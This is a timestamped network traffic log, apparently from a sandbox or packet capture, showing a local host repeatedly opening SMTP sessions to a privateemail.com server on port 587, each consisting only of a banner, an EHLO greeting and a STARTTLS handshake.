Jan 14, 2021 08:00:46.861597061 CET	587	49778	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:46.861906052 CET	49778	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:47.052179098 CET	587	49778	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:47.706816912 CET	587	49779	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:47.713439941 CET	49779	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:47.904191971 CET	587	49779	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:47.907737017 CET	49779	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:48.097883940 CET	587	49779	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:50.194633961 CET	587	49780	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:50.195271015 CET	49780	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:50.385718107 CET	587	49780	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:50.386029959 CET	49780	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:50.576061964 CET	587	49780	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:53.301513910 CET	587	49781	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:53.301795006 CET	49781	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:53.492562056 CET	587	49781	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:53.492883921 CET	49781	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:53.682801008 CET	587	49781	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:57.209950924 CET	587	49782	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:57.210242033 CET	49782	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:57.401289940 CET	587	49782	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:57.404664040 CET	49782	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:57.597613096 CET	587	49782	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:58.314656019 CET	587	49784	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:58.317277908 CET	49784	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:58.324326038 CET	587	49783	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:00:58.325126886 CET	49783	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:00:58.508018017 CET	587	49784	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:58.508310080 CET	49784	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:58.517420053 CET	587	49783	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:00:58.517796993 CET	49783	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:00:58.698154926 CET	587	49784	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:00:58.708192110 CET	587	49783	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:01.153760910 CET	587	49785	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:01.154012918 CET	49785	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:01.344062090 CET	587	49785	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:01.344387054 CET	49785	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:01.534154892 CET	587	49785	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:01.866694927 CET	587	49786	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:01.867805958 CET	49786	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:02.058806896 CET	587	49786	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:02.059304953 CET	49786	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:02.250293016 CET	587	49786	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:03.881658077 CET	587	49787	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:03.881896019 CET	49787	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:04.072146893 CET	587	49787	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:04.072447062 CET	49787	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:04.262357950 CET	587	49787	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:05.761015892 CET	587	49788	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:05.761476994 CET	49788	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:05.951705933 CET	587	49788	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:05.952223063 CET	49788	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:06.142236948 CET	587	49788	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:06.823236942 CET	587	49789	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:06.823589087 CET	49789	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:07.014662027 CET	587	49789	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:07.015180111 CET	49789	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:07.205461025 CET	587	49789	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:09.630564928 CET	587	49790	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:09.631012917 CET	49790	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:09.821367979 CET	587	49790	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:09.821949959 CET	49790	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:10.012123108 CET	587	49790	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:12.748764992 CET	587	49791	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:12.749078989 CET	49791	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:12.939315081 CET	587	49791	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:12.939600945 CET	49791	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:13.129544020 CET	587	49791	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:14.087682009 CET	587	49792	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:14.088027000 CET	49792	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:14.281205893 CET	587	49792	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:14.283047915 CET	49792	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:14.474591017 CET	587	49792	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:15.534230947 CET	587	49793	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:15.534540892 CET	49793	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:15.726432085 CET	587	49793	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:15.726715088 CET	49793	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:15.916903973 CET	587	49793	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:17.690021038 CET	587	49795	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:17.690251112 CET	49795	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:17.880609989 CET	587	49795	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:17.880868912 CET	49795	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:18.072803020 CET	587	49795	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:18.612931967 CET	587	49797	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:18.613706112 CET	49797	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:18.804374933 CET	587	49797	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:18.804801941 CET	49797	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:18.999006033 CET	587	49797	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:21.284363985 CET	587	49798	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:21.284882069 CET	49798	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:21.480458021 CET	587	49798	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:21.481062889 CET	49798	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:21.532888889 CET	587	49799	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:21.533421040 CET	49799	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:21.671130896 CET	587	49798	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:21.724421978 CET	587	49799	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:21.724963903 CET	49799	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:21.915255070 CET	587	49799	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:25.625089884 CET	587	49800	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:25.625545979 CET	49800	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:25.816255093 CET	587	49800	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:25.816869020 CET	49800	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:26.007025957 CET	587	49800	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:27.853097916 CET	587	49801	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:27.853763103 CET	49801	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:27.858159065 CET	587	49802	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:28.044333935 CET	587	49801	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:28.044605017 CET	49801	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:28.235030890 CET	587	49801	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:30.335285902 CET	587	49803	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:30.335592031 CET	49803	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:30.526629925 CET	587	49803	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:30.533440113 CET	49803	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:30.723768950 CET	587	49803	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:31.604931116 CET	49802	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:31.795408964 CET	587	49802	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:32.814342976 CET	49802	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:33.004206896 CET	587	49802	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:34.456821918 CET	587	49804	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:34.457135916 CET	49804	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:34.649202108 CET	587	49804	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:34.649521112 CET	49804	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:34.840384007 CET	587	49804	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:38.893692970 CET	587	49805	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:38.894042969 CET	49805	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:39.085583925 CET	587	49805	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:39.085908890 CET	49805	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:39.276056051 CET	587	49805	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:41.736498117 CET	587	49806	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:41.737001896 CET	49806	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:41.927407980 CET	587	49806	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:41.927922010 CET	49806	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:42.118094921 CET	587	49806	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:43.635668993 CET	587	49807	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:43.638381004 CET	49807	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:43.750307083 CET	587	49808	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:43.751010895 CET	49808	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:43.829294920 CET	587	49807	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:43.829917908 CET	49807	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:43.941509962 CET	587	49808	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:43.941972017 CET	49808	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:44.019892931 CET	587	49807	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:44.132210970 CET	587	49808	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:48.039824009 CET	587	49809	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:48.040148973 CET	49809	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:48.230098009 CET	587	49809	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:48.230492115 CET	49809	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:48.420342922 CET	587	49809	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:50.000015974 CET	587	49810	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:50.000456095 CET	49810	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:50.191111088 CET	587	49810	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:50.192306042 CET	49810	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:50.382050991 CET	587	49810	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:50.885778904 CET	587	49811	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:50.886068106 CET	49811	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:51.076761007 CET	587	49811	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:51.077038050 CET	49811	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:51.267127037 CET	587	49811	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:51.693038940 CET	587	49812	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:51.693440914 CET	49812	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:51.883703947 CET	587	49812	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:51.883953094 CET	49812	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:52.073928118 CET	587	49812	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:53.076587915 CET	587	49813	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:53.077069998 CET	49813	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:53.270800114 CET	587	49813	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:53.271234989 CET	49813	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:53.461445093 CET	587	49813	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:55.668385029 CET	587	49814	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:55.668708086 CET	49814	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:55.859302044 CET	587	49814	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:55.861972094 CET	49814	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:56.052262068 CET	587	49814	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:01:57.486742973 CET	587	49815	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:01:57.488416910 CET	49815	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:01:57.678283930 CET	587	49815	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:01:57.679305077 CET	49815	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:01:57.868951082 CET	587	49815	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:02.119780064 CET	587	49816	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:02.120094061 CET	49816	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:02.310462952 CET	587	49816	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:02.311018944 CET	49816	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:02.501113892 CET	587	49816	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:04.162039042 CET	587	49817	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:04.163682938 CET	49817	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:04.353744030 CET	587	49817	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:04.354710102 CET	49817	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:04.544641972 CET	587	49817	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:06.739955902 CET	587	49818	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:06.741179943 CET	49818	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:06.931835890 CET	587	49818	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:06.932323933 CET	49818	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:07.122363091 CET	587	49818	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:09.375710011 CET	587	49823	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:09.376919985 CET	49823	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:09.568360090 CET	587	49823	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:09.572520018 CET	49823	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:09.762430906 CET	587	49823	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:11.413281918 CET	587	49827	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:11.413774014 CET	49827	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:11.604326963 CET	587	49827	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:11.605890036 CET	49827	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:11.795685053 CET	587	49827	199.193.7.228	192.168.2.3	220 Ready to start TLS
Jan 14, 2021 08:02:14.680536032 CET	587	49831	199.193.7.228	192.168.2.3	220 PrivateEmail.com prod Mail Node
Jan 14, 2021 08:02:14.682537079 CET	49831	587	192.168.2.3	199.193.7.228	EHLO 181598
Jan 14, 2021 08:02:14.873294115 CET	587	49831	199.193.7.228	192.168.2.3	250-mta-12.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 14, 2021 08:02:14.905807018 CET	49831	587	192.168.2.3	199.193.7.228	STARTTLS
Jan 14, 2021 08:02:15.096021891 CET	587	49831	199.193.7.228	192.168.2.3	220 Ready to start TLS
